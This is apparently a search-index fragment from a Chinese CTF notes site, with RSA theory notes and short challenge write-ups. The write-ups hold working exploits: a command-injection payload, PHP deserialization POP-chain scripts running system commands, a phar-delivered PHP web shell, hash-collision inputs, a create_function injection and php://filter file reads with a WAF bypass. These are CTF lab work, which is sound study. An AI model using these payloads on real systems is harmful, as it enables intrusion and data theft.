","tags":["\u7b2c\u4e09\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/RSA%E7%AE%97%E6%B3%95%E5%8E%9F%E7%90%86/#rsa_1","title":"\u4e00\u3001RSA\u52a0\u5bc6\u8fc7\u7a0b\uff1a","text":"","tags":["\u7b2c\u4e09\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/RSA%E7%AE%97%E6%B3%95%E5%8E%9F%E7%90%86/#1rsa","title":"\uff081\uff09RSA\u57fa\u672c\u539f\u5219\uff1a","text":"\u200b RSA \u80cc\u540e\u7684\u4e00\u4e2a\u57fa\u672c\u539f\u5219\u662f\u89c2\u5bdf\u5230\u627e\u5230\u4e09\u4e2a\u975e\u5e38\u5927\u7684\u6b63\u6574\u6570 e\u3001d \u548c n \u662f\u53ef\u884c\u7684\uff0c\u4f7f\u5f97\u5bf9\u6240\u6709\u6574\u6570 m\uff080 \u2264 m < n\uff09\u8fdb\u884c\u6a21\u5e42\u8fd0\u7b97\uff1a
\u200b
\u200b \u4e09\u6760\u8868\u793a\u6a21\u540c\u4f59\uff0c\u4e5f\u5c31\u662f\u5f53\u8c03\u6362e\u548cd\u7684\u4f4d\u7f6e\uff0c\u4f1a\u6709\u76f8\u540c\u7684\u4f59\u6570
RSA \u6d89\u53ca\u516c\u94a5\u548c\u79c1\u94a5\u3002\u516c\u94a5\u662f\u4f17\u6240\u5468\u77e5\u7684\uff0c\u7528\u4e8e\u52a0\u5bc6\u6d88\u606f\u3002\u76ee\u7684\u662f\u4f7f\u7528\u516c\u94a5\u52a0\u5bc6\u7684\u6d88\u606f\u53ea\u80fd\u5728\u5408\u7406\u7684\u65f6\u95f4\u5185\u4f7f\u7528\u79c1\u94a5\u89e3\u5bc6\u3002\u516c\u94a5\u7531\u6574\u6570n\u548ce\u8868\u793a\uff0c\u79c1\u94a5\u7531\u6574\u6570d\u8868\u793a\uff08\u5c3d\u7ba1\u5728\u89e3\u5bc6\u8fc7\u7a0b\u4e2d\u4e5f\u4f1a\u4f7f\u7528n\uff0c\u56e0\u6b64\u5b83\u4e5f\u53ef\u80fd\u88ab\u8ba4\u4e3a\u662f\u79c1\u94a5\u7684\u4e00\u90e8\u5206\uff09\u3002m\u4ee3\u8868\u6d88\u606f\u3002
","tags":["\u7b2c\u4e09\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/RSA%E7%AE%97%E6%B3%95%E5%8E%9F%E7%90%86/#2","title":"\uff082\uff09\u5bc6\u94a5\u751f\u6210\uff1a","text":"RSA\u7b97\u6cd5\u7684\u5bc6\u94a5\u4ee5\u4e0b\u65b9\u5f0f\u751f\u6210\uff1a
1.\u9009\u62e9\u4e24\u4e2a\u76f8\u5dee\u5927\u7684\u5927\u8d28\u6570 p \u548c q
\u200b \u4e3a\u4e86\u4f7f\u5f97\u56e0\u5f0f\u5206\u89e3\u66f4\u96be\uff0cp\u548cq\u8981\u968f\u673a\u9009\u62e9\uff1a\u4e3a\u4e86\u9009\u62e9\u5b83\u4eec\uff0c\u6807\u51c6\u65b9\u6cd5\u662f\u9009\u62e9\u968f\u673a\u6574\u6570\u5e76\u4f7f\u7528\u7d20\u6570\u6d4b\u8bd5\uff0c\u76f4\u5230\u627e\u5230\u4e24\u4e2a\u7d20\u6570\u3002p\u548cq\u5e94\u4fdd\u5bc6
2.\u8ba1\u7b97n
\u200b n = p*q
\u200b n\u4f5c\u4e3a\u516c\u94a5\u548c\u79c1\u94a5\u7684\u6a21\u6570\u3002\u5b83\u7684\u957f\u5ea6\uff0c\u901a\u5e38\u7528\u6bd4\u7279\u6765\u8868\u793a\uff0c\u5c31\u662f\u5bc6\u94a5\u957f\u5ea6
3.\u8ba1\u7b97\u03bb ( n )
\u5728\u6570\u8bba\u8fd9\u4e00\u6570\u5b66\u5206\u652f\u4e2d\uff0c\u6b63\u6574\u6570n\u7684Carmichael \u51fd\u6570 \u03bb ( n )\u662f\u6ee1\u8db3\u4ee5\u4e0b\u6761\u4ef6\u7684 \u6700\u5c0f\u6b63\u6574\u6570m
\u200b \u5728\u4ee3\u6570\u672f\u8bed\u4e2d\uff0c\u03bb ( n )\u662f\u6574\u6570\u4e58\u6cd5\u7fa4\u5bf9n\u53d6\u6a21\u7684\u6307\u6570\u3002
\u7531\u4e8en = pq , \u03bb ( n ) = lcm ( \u03bb ( p ), \u03bb ( q ))\uff0c\u5e76\u4e14\u7531\u4e8ep\u548cq\u662f\u7d20\u6570\uff0c\u56e0\u6b64\u03bb ( p ) = \u03c6 ( p ) = p \u2212 1\uff0c\u540c\u6837\u5730\u03bb ( q ) = q \u2212 1\u3002\u56e0\u6b64\u03bb( n ) = lcm( p \u2212 1, q \u2212 1)\u3002
4.\u9009\u62e9\u4e00\u4e2a\u6574\u6570e\u4f7f\u5f972 < e < \u03bb ( n )\u548cgcd ( e , \u03bb ( n )) = 1\uff1b\u4e5f\u5c31\u662f\u8bf4\uff0ce\u548c\u03bb ( n )\u4e92\u8d28\u3002
\u200b \u6700\u5e38\u9009\u62e9\u7684e\u503c\u662f2^16 + 1 =65537
\u200b e\u4f5c\u4e3a\u516c\u94a5\u7684\u4e00\u90e8\u5206\u53d1\u5e03
5.\u786e\u5b9ad
\u200b d \u2261 e \u22121 (mod \u03bb ( n ))\uff1b\u4e5f\u5c31\u662f\u8bf4\uff0cd\u662fe\u6a21\u03bb ( n )\u7684\u6a21\u4e58\u9006
\u200b
","tags":["\u7b2c\u4e09\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/RSA%E7%AE%97%E6%B3%95%E5%8E%9F%E7%90%86/#ras","title":"\u4e8c\u3001RAS\u89e3\u5bc6\u8fc7\u7a0b\uff1a","text":"\u200b \u901a\u8fc7\u8ba1\u7b97\u4f7f\u5f97\u79c1\u94a5\u6307\u6570\u4eced\u5230c\u6062\u590dm
\u793a\u4f8b\uff1a
\u200b \u4f46\u5b9e\u9645\u4f7f\u7528\u4e2d\u56fd\u4f59\u6570\u5b9a\u7406\u6765\u52a0\u901f\u56e0\u5b50\u6a21\u6570\u7684\u8ba1\u7b97\uff08mod pq \u4f7f\u7528 mod p \u548c mod q)
","tags":["\u7b2c\u4e09\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/RSA%E7%AE%97%E6%B3%95%E5%8E%9F%E7%90%86/#_1","title":"\u4e2d\u56fd\u4f59\u6570\u7b97\u6cd5\uff1a","text":"\u200b
\u200b
","tags":["\u7b2c\u4e09\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/RSA%E7%AE%97%E6%B3%95%E5%8E%9F%E7%90%86/#_2","title":"\u7b7e\u540d\u6d88\u606f","text":"\u5047\u8bbe Alice \u5e0c\u671b\u5411 Bob \u53d1\u9001\u4e00\u6761\u7b7e\u540d\u6d88\u606f\u3002\u5979\u53ef\u4ee5\u4f7f\u7528\u81ea\u5df1\u7684\u79c1\u94a5\u6765\u8fd9\u6837\u505a\u3002\u5979\u751f\u6210\u6d88\u606f\u7684\u6563\u5217\u503c\uff0c\u5c06\u5176\u8ba1\u7b97\u4e3ad\u7684\u5e42\uff08\u6a21n\uff09\uff08\u5c31\u50cf\u5979\u5728\u89e3\u5bc6\u6d88\u606f\u65f6\u6240\u505a\u7684\u90a3\u6837\uff09\uff0c\u5e76\u5c06\u5176\u4f5c\u4e3a\u201c\u7b7e\u540d\u201d\u9644\u52a0\u5230\u6d88\u606f\u4e2d\u3002\u5f53 Bob \u6536\u5230\u7b7e\u540d\u6d88\u606f\u65f6\uff0c\u4ed6\u4f7f\u7528\u76f8\u540c\u7684\u54c8\u5e0c\u7b97\u6cd5\u7ed3\u5408 Alice \u7684\u516c\u94a5\u3002\u4ed6\u5bf9\u7b7e\u540d\u6c42e\u6b21\u65b9\uff08\u6a21n\uff09\uff08\u5c31\u50cf\u4ed6\u5728\u52a0\u5bc6\u6d88\u606f\u65f6\u6240\u505a\u7684\u90a3\u6837\uff09\uff0c\u5e76\u5c06\u751f\u6210\u7684\u6563\u5217\u503c\u4e0e\u6d88\u606f\u7684\u6563\u5217\u503c\u8fdb\u884c\u6bd4\u8f83\u3002\u5982\u679c\u4e24\u8005\u4e00\u81f4\uff0c\u4ed6\u5c31\u77e5\u9053\u6d88\u606f\u7684\u4f5c\u8005\u62e5\u6709\u7231\u4e3d\u4e1d\u7684\u79c1\u94a5\uff0c\u5e76\u4e14\u6d88\u606f\u81ea\u53d1\u9001\u4ee5\u6765\u6ca1\u6709\u88ab\u7be1\u6539\u8fc7\u3002
\u8fd9\u662f\u8fd0\u7528\u4e86\u6c42\u5e42\u89c4\u5219\uff1a
","tags":["\u7b2c\u4e09\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/RSA%E7%AE%97%E6%B3%95%E5%8E%9F%E7%90%86/#_3","title":"\u8d39\u9a6c\u5c0f\u5b9a\u7406","text":"\u200b \u5982\u679cp\u662f\u7d20\u6570\uff0c\u5219\u5bf9\u4e8e\u4efb\u610f\u7684a\uff0c\u6570a^p-a\u662fp\u7684\u6574\u6570\u500d\u3002
\u200b
\u4f8b\u5982 a =2, p =7 \u5219 2^7 = 128,128-2=126=7*18 \u4e3a7\u7684\u6574\u6570\u500d
\u5982\u679ca \u4e0d\u80fd\u88abp\u6574\u9664\uff0c\u5373\u5982\u679ca\u4e0ep\u4e92\u8d28\uff0c\u8d39\u9a6c\u5c0f\u5b9a\u7406\u7b49\u4ef7\u4e8e\uff08p^-1\uff09-1\u662fp\u7684\u6574\u6570\u500d
","tags":["\u7b2c\u4e09\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/RSA%E7%AE%97%E6%B3%95%E5%8E%9F%E7%90%86/#_4","title":"\u603b\u7ed3\uff1a","text":"\u5728RSA\u5bc6\u7801\u5e94\u7528\u4e2d\uff0c\u516c\u94a5\u662f\u88ab\u516c\u5f00\u7684\uff0c\u5373e\u548cn\u7684\u6570\u503c\u662f\u53ef\u4ee5\u88ab\u5f97\u5230\u7684\u3002\u7834\u89e3RSA\u5bc6\u7801\u5c31\u662f\u4ece\u5df2\u77e5\u7684\u989d\u548cn\u6c42\u5f97d\u3002\u8fd9\u6837\u5c31\u53ef\u4ee5\u4f7f\u7528\u79c1\u94a5\u6765\u7834\u89e3\u5bc6\u6587\u4e86\u3002
\u4f46\u5f53p\u548cq\u662f\u4e00\u4e2a\u5f88\u5927\u7684\u7d20\u6570\u65f6\uff0c\u4ecen\u53bb\u5206\u89e3\u56e0\u5b50p\u548cq\uff0c\u662f\u6570\u5b66\u754c\u516c\u8ba4\u7684\u96be\u9898\u3002
\u56e0\u6b64\uff0c\u5728\u8fdb\u884cRSA\u52a0\u5bc6\u7684\u65f6\u5019\uff0c\u5e94\u5c3d\u91cf\u7684\u4f7f\u7528\u8db3\u591f\u5927\u7684p\u548cq\uff0c\u6765\u4fdd\u8bc1d\u4e0d\u4f1a\u88ab\u7b97\u51fa
\u4f46\u662f\uff0cRSA\u7684\u7f3a\u70b9\u4e5f\u5f88\u660e\u663e\uff1a
\u200b RSA\u7684\u5b89\u5168\u6027\u5b8c\u5168\u6765\u81ea\u4e8e\u56e0\u5b50\u5206\u89e3\uff0c\u7834\u8bd1RSA\u7684\u96be\u5ea6\u7b49\u4ef7\u4e8e\u5206\u89e3\u56e0\u5b50\u7684\u96be\u5ea6
\u200b \u5bc6\u94a5\u7684\u4ea7\u751f\u5341\u5206\u9ebb\u70e6\uff0c\u53d7\u5230p\u548cq\u7684\u5f71\u54cd\uff0c\u5f88\u96be\u505a\u5230\u4e00\u6b21\u4e00\u4e2a\u5bc6\u94a5
\u200b RSA\u9700\u8981\u66f4\u957f\u7684\u5bc6\u94a5\uff0c\u8fd9\u5c31\u4f7f\u5f97\u8fd0\u7b97\u901f\u5ea6\u8f83\u6162\u3002
","tags":["\u7b2c\u4e09\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/problem-1096-wp/","title":"[GXYCTF 2019]Ping Ping Ping","text":"\u6c99\u7bb1 $ISF9\u7ed5\u8fc7\u7a7a\u683c
exp ?ip=localhost;a=ag;b=fl;cat$IFS$9$b$a.php
\u7136\u540eF12\u770b\u5c31\u80fd\u770b\u5230\u4e86~~\u624d\u4e0d\u4f1a\u8bf4\u56e0\u4e3a\u8fd9\u4e2a\u5361\u4e86\u591a\u4e45~~
"},{"location":"ctfnotes/problem-1852-wp/","title":"[NISACTF 2022]babyserialize","text":" \u5ba1\u8ba1\u6e90\u7801 \u6784\u5efapop\u94fe NISA.__invoke()\n=>Ilovetxw.__toString()\n =>four.__set(fun,\"sixsixsix\")\n =>Ilovetxw.__call(nisa,\"sixsixsix\")\n =>TianXiWei.__wakeup()\n
\u5199exp <?php\n\nclass NISA\n{\n public $fun = \"show_me_fla\";\n public $txw4ever;\n public function __wakeup()\n {\n if ($this->fun == \"show_me_flag\") {\n hint();\n }\n }\n function __call($from, $val)\n {\n $this->fun = $val[0];\n }\n\n public function __toString()\n {\n echo $this->fun;\n return \" \";\n }\n public function __invoke()\n {\n checkcheck($this->txw4ever);\n @eval($this->txw4ever);\n }\n}\n\nclass TianXiWei\n{\n public $ext;\n public $x;\n public function __wakeup()\n {\n $this->ext->nisa($this->x);\n }\n}\n\nclass Ilovetxw\n{\n public $huang;\n public $su;\n public function __call($fun1, $arg)\n {\n $this->huang->fun = $arg[0];\n }\n\n public function __toString()\n {\n $bb = $this->su;\n return $bb();\n }\n}\n\nclass four\n{\n public $a = \"TXW4EVER\";\n private $fun = 'abc';\n public function __set($name, $value)\n {\n $this->$name = $value;\n if ($this->fun = \"sixsixsix\") {\n strtolower($this->a);\n }\n }\n}\n\n$a = new NISA;\n$b = new Ilovetxw;\n$c = new four;\n$d = new Ilovetxw;\n$f = new TianXiWei;\n//\n//$a->txw4ever = 'SYSTEM(\"ls /\");';\n$a->txw4ever = 'SYSTEM(\"cat /fllllllaaag\");';\n$b->su = $a;\n$c->a = $b;\n$d->huang = $c;\n$f->x = \"sixsixsix\";\n$f->ext = $d;\n\necho urlencode(serialize($f));\n//\n\n
\u5f97\u5230flag
"},{"location":"ctfnotes/problem-2026-wp/","title":"[NISACTF 2022]bingdundun~","text":"phar \u4e0a\u4f20\u7136\u540ephar\u4f2a\u534f\u8bae\u8bbf\u95ee
\n//pchar.php\n<?php\n$phar = new Phar('exp.phar'); //\n$phar->buildFromDirectory('./exp');//buildFromDirectory\u6307\u5b9a\u538b\u7f29\u7684\u76ee\u5f55\n$phar->compressFiles(Phar::GZ); //Phar::GZ\u8868\u793a\u4f7f\u7528gzip\u6765\u538b\u7f29\u6b64\u6587\u4ef6\n$phar->stopBuffering();\n$phar->setStub($phar->createDefaultStub('exp.php'));//setSub\u7528\u6765\u8bbe\u7f6e\u542f\u52a8\u52a0\u8f7d\u7684\u6587\u4ef6\n?>\n//exp/exp.php\n<?php\n@eval($_POST['shell']);\n?>\n
\u6700\u540e\u8681\u5251\u8bbf\u95ee \u5bc6\u7801shell ?bingdundun=phar://./upload_name/exp
flag\u5c31\u5728/flag\u91cc
"},{"location":"ctfnotes/problem-2036-wp/","title":"[NISACTF 2022]level-up","text":" level-1 \u8fdb\u5165\u5199\u7740nothing here F12\u53d1\u73b0\u5199\u7740disallow \u63a8\u6d4brobots.txt \u8bbf\u95ee\u5373\u83b7\u5f97level 2\u5730\u5740 level-2 php md5 \u5f3a\u78b0\u649e post array1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2 &array2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2 \u89e3\u51b3 \u5f97\u5230level 3\u5730\u5740 level-3 php sha1 \u5f3a\u78b0\u649e post array1=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1 &array2=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1 
\u5f97\u5230level-4\u5730\u5740 level-4 php\u53d8\u91cf\u89e3\u6790\u7ed5\u8fc7 \u4f7f\u7528GET NI+SA+=txw4ever \u5f97\u5230level5\u5730\u5740 level-5 createfunction\u7ed5\u8fc7 exp ?a=\\create_function&b=return%200;}var_dump(system(\"cat%20/flag\"));/*
\u5f97\u5230flag "},{"location":"ctfnotes/problem-2049-wp/","title":"[NISACTF 2022]huaji?","text":" binwalk\u5206\u6790 \u5f97\u5230\u5185\u90e8\u6709\u4e2a\u538b\u7f29\u5305 \u52a0\u5bc6\u4e86 \u5728\u539f\u56fe\u5927\u7a7a\u767d\u5904\u627e\u5230 \u4e24\u6bb5 6374665f4e4953415f32303232 6e6973615f32303232 hex\u7f16\u7801\u5f97 ctf_NISA_2022 \u548cnisa_2022 \u6210\u529f\u89e3\u538b\u538b\u7f29\u5305\u5f97\u5230flag "},{"location":"ctfnotes/problem-2074-wp/","title":"[NSSCTF 2022 Spring Recruit]ezgame","text":"F12\u5206\u6790\u5373\u62ffflag\u5728./js/preload.js\u91cc
"},{"location":"ctfnotes/problem-2076-wp/","title":"[NSSCTF 2022 Spring Recruit]babyphp","text":" \u7b2c\u4e00\u5c42\u975e\u7a7a\u6570\u7ec4\u7ed5\u8fc7 post a[]=[1] \u975e\u7a7a\u7a7a\u6570\u7ec4MD5 post b1[]=[1]&b2[]=[2] MD5 \u7ed5\u8fc7 post c1=s878926199a&c2=s155964671a "},{"location":"ctfnotes/problem-2099-wp/","title":"[NISACTF 2022]popchains","text":" \u5ba1\u8ba1\u6e90\u7801 \u6784\u5efapop\u94fe Try_Work_Hard.__invoke()\n =>Make_a_change.__get\n => Road_is_Long.__toString()\n => Road_is_Long.__wakeup()\n
\u7f16\u5199exp ~~\u6709\u574fb\u8bef\u5bfc\u6211\u6211\u4e0d\u8bf4\u662f\u8c01~~ <?php\n\n//echo 'Happy New Year~ MAKE A WISH<br>';\n\n/***************************pop your 2022*****************************/\n\nclass Road_is_Long\n{\n public $page;\n public $string;\n public function __construct($file = 'index.php')\n {\n $this->page = $file;\n }\n public function __toString()\n {\n return $this->string->page;\n }\n\n public function __wakeup()\n {\n if (preg_match(\"/file|ftp|http|https|gopher|dict|\\.\\./i\", $this->page)) {\n echo \"You can Not Enter 2022\";\n $this->page = \"index.php\";\n }\n }\n}\n\nclass Try_Work_Hard\n{\n protected $var;\n public function __construct(){\n $this->var = \"/flag\";\n }\n public function append($value)\n {\n include($value);\n }\n public function __invoke()\n {\n $this->append($this->var);\n }\n}\n\nclass Make_a_Change\n{\n public $effort;\n public function __construct()\n {\n $this->effort = array();\n }\n\n public function __get($key)\n {\n $function = $this->effort;\n return $function();\n }\n}\n\n$a = new Try_Work_Hard;\n$b = new Make_a_Change;\n$c = new Road_is_Long;\n$d = new Road_is_Long;\n\n$b->effort = $a;\n$c->string = $b;\n$d->page = $c;\necho \"?wish=\" . urlencode(serialize($d));\n
"},{"location":"ctfnotes/problem-227-wp/","title":"[\u7f8a\u57ce\u676f 2021]Bigrsa","text":" \u5171\u4eab\u7d20\u6570 $n_1 n_2$\u6709\u4e00\u7d20\u6570\u516c\u56e0\u6570$p$ $n_1=pq_1 n_2=pq_2$ $d_1e\\equiv 1\\space mod\\space\\varphi(n_1)$ $d_2e\\equiv 1\\space mod\\space\\varphi(n_2)$ $\\therefore \u53ea\u9700\u8981\u9006\u5143\u6c42\u51fa\\frac{1}{e}\\space mod\\space \\varphi(n_1)\u548c\\frac{1}{e}\\space mod\\space \\varphi(n_2)\u5c31\u53ef\u4ee5\u5f97\u5230d_1\u548cd_2$ exp from gmpy2 import *\nfrom Crypto.Util.number import *\n\nn1 = 103835296409081751860770535514746586815395898427260334325680313648369132661057840680823295512236948953370895568419721331170834557812541468309298819497267746892814583806423027167382825479157951365823085639078738847647634406841331307035593810712914545347201619004253602692127370265833092082543067153606828049061\nn2 = 115383198584677147487556014336448310721853841168758012445634182814180314480501828927160071015197089456042472185850893847370481817325868824076245290735749717384769661698895000176441497242371873981353689607711146852891551491168528799814311992471449640014501858763495472267168224015665906627382490565507927272073\ne = 65537\nc = 60406168302768860804211220055708551816238816061772464557956985699400782163597251861675967909246187833328847989530950308053492202064477410641014045601986036822451416365957817685047102703301347664879870026582087365822433436251615243854347490600004857861059245403674349457345319269266645006969222744554974358264\np = gmpy2.gcd(n1, n2)\nq1, q2 = n1//p, n2//p\nphi_n1, phi_n2 = (p-1)*(q1-1), (p-1)*(q2-1)\nd1, d2 = inverse(e, phi_n1), inverse(e, phi_n2)\n\nm = pow(pow(c, d2, n2), d1, n1)\nprint(long_to_bytes(m).decode())\n
"},{"location":"ctfnotes/problem-2422-wp/","title":"[\u9e4f\u57ce\u676f 2022]\u7b80\u5355\u5305\u542b","text":" \u5ba1\u8ba1\u6e90\u7801\u53d1\u73b0\u5176\u4f1ainclude'flag'\u7684\u6587\u4ef6\u8fdb\u6765 \u5c1d\u8bd5post flag exp-fake
flag = flag.php\n
\u83b7\u5f97nssctf waf!
\u5c1d\u8bd5\u83b7\u53d6flag.php
flag = php://filter/read=convert.base64-encode/resource=/var/www/html/flag.php\n
\u4ecd\u7136\u83b7\u5f97\u83b7\u5f97nssctf waf!
\u5c1d\u8bd5\u83b7\u53d6index.php
flag = php://filter/read=convert.base64-encode/resource=/var/www/html/index.php\n
\u89e3\u7801\u5f97
<?php\n\n$path = $_POST[\"flag\"];\n\nif (strlen(file_get_contents('php://input')) < 800 && preg_match('/flag/', $path)) {\n echo 'nssctf waf!';\n} else {\n @include($path);\n} ?>\n\n<code>\n<span style=\"color: #000000\">\n<span style=\"color: #0000BB\"><?php <br />highlight_file</span><span style=\"color: #007700\">(</span><span style=\"color: #0000BB\">__FILE__</span><span style=\"color: #007700\">);<br />include(</span><span style=\"color: #0000BB\">$_POST</span><span style=\"color: #007700\">[</span><span style=\"color: #DD0000\">\"flag\"</span><span style=\"color: #007700\">]);<br /></span><span style=\"color: #FF8000\">//flag in /var/www/html/flag.php;</span>\n</span>\n</code><br />\n\n
\u5f97\u77e5\u53ef\u4ee5\u901a\u8fc7post\u8d85\u957f\u7684request\u6765\u7ed5\u8fc7 \u6240\u4ee5 exp
a=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&flag = php://filter/read=convert.base64-encode/resource=/var/www/html/flag.php\n
\u89e3\u7801\u5373\u83b7\u5f97flag
"},{"location":"ctfnotes/problem-2602-wp/","title":"[HUBUCTF 2022 \u65b0\u751f\u8d5b]checkin","text":" \u5ba1\u8ba1\u6e90\u7801 \u53d1\u73b0\u4f7f\u7528 == \u5199exp <?php \n$data_unserialize = [\"username\"=>true,\"password\"=>true];\necho \"?info=\"urlencode(serialize(($data_unserialize)));\n
\u4f20\u5165\u5373\u5f97
"},{"location":"ctfnotes/problem-39-wp/","title":"[SWPU 2019]\u795e\u5947\u7684\u4e8c\u7ef4\u7801","text":" binwalk \u5206\u6790 \u53d1\u73b0\u91cc\u9762\u67094\u4e2a\u538b\u7f29\u5305 binwalk -b \u89e3\u5f00 \u5f97\u5230flag.doc
,flag.jpg
,encode.txt
,good.rar
4\u4e2a\u4e3b\u8981\u6587\u4ef6 \u5bf9flag.doc\u5185\u90e8\u5185\u5bb9\u89e3\u7801 \u5f97\u5230 comEON_YOuAreSOSoS0great
\u8fd9\u4e2a\u5c31\u662fgood.rar\u7684\u89e3\u538b\u5bc6\u7801 \u89e3\u5f00good.rar\u5f97\u5230good.mp3 \u542c\u4e00\u4e0b\u4e3a\u6469\u65af\u7535\u7801 Audacity \u53ef\u89c6\u5316 \u5728\u7ebf\u89e3\u7801\u4e0b\u5f97\u5230flag "},{"location":"ctfnotes/problem-403-wp/","title":"[SWPUCTF 2021 \u65b0\u751f\u8d5b]\u7b80\u7b80\u5355\u5355\u7684\u903b\u8f91","text":" \u5ba1\u8ba1\u6e90\u7801 \u56e0\u4e3a\u5f02\u6216\u7684\u9006\u8fd0\u7b97\u5c31\u662f\u5f02\u6216 \u6240\u4ee5\u53ef\u4ee5\u76f4\u63a5\u7f16\u5199exp \u7f16\u5199exp def decode(cipher):\n flag = ''\n for i in range(len(list)):\n key = (list[i]>>4)+((list[i] & 0xf)<<4)\n now = cipher[2*i:2*i+2]\n print(now)\n now = int(now,16)\n print(now)\n now^=key\n flag+=chr(now)\n print(flag)\ndecode(result)\n
"},{"location":"ctfnotes/problem-404-wp/","title":"[SWPUCTF 2021 \u65b0\u751f\u8d5b]\u7b80\u7b80\u5355\u5355\u7684\u89e3\u5bc6","text":"\u6ca1\u4ec0\u4e48\u597d\u5199\u7684\u7167\u7740\u4ee3\u7801\u9006\u56de\u53bb\u5c31\u884c\u4e86
import base64\nimport urllib.parse\nkey = \"HereIsFlagggg\"\ns_box = list(range(256))\nj = 0\nfor i in range(256):\n j = (j + s_box[i] + ord(key[i % len(key)])) % 256\n s_box[i], s_box[j] = s_box[j], s_box[i]\nenc = \"%C2%A6n%C2%87Y%1Ag%3F%C2%A01.%C2%9C%C3%B7%C3%8A%02%C3%80%C2%92W%C3%8C%C3%BA\"\n\nenc = urllib.parse.unquote(enc)\ncrypt = str(base64.b64encode(bytes(enc, 'utf8')), 'utf-8')\ncipher = base64.b64decode(bytes(crypt, 'utf8')).decode('utf-8')\nres = list(cipher)\nflag = ''\ni = j = 0\nfor s in res:\n i = (i + 1) % 256\n j = (j + s_box[i]) % 256\n s_box[i], s_box[j] = s_box[j], s_box[i]\n t = (s_box[i] + s_box[j]) % 256\n k = s_box[t]\n flag += chr(ord(s)^k)\nprint(flag)\n
"},{"location":"ctfnotes/problem-413-wp/","title":"[SWPUCTF 2021 \u65b0\u751f\u8d5b]crypto2","text":"\u5171\u6a21\u653b\u51fb
\u987a\u4fbf\u5de9\u56fa\u4e0brsa
\u7b26\u53f7 c
:\u5bc6\u6587 m
:\u660e\u6587 (d,n)
:\u79c1\u94a5 (e,n)
:\u516c\u94a5
p
q
\u4e3a\u751f\u6210n
\u7684\u4e24\u4e2a\u5927\u8d28\u6570
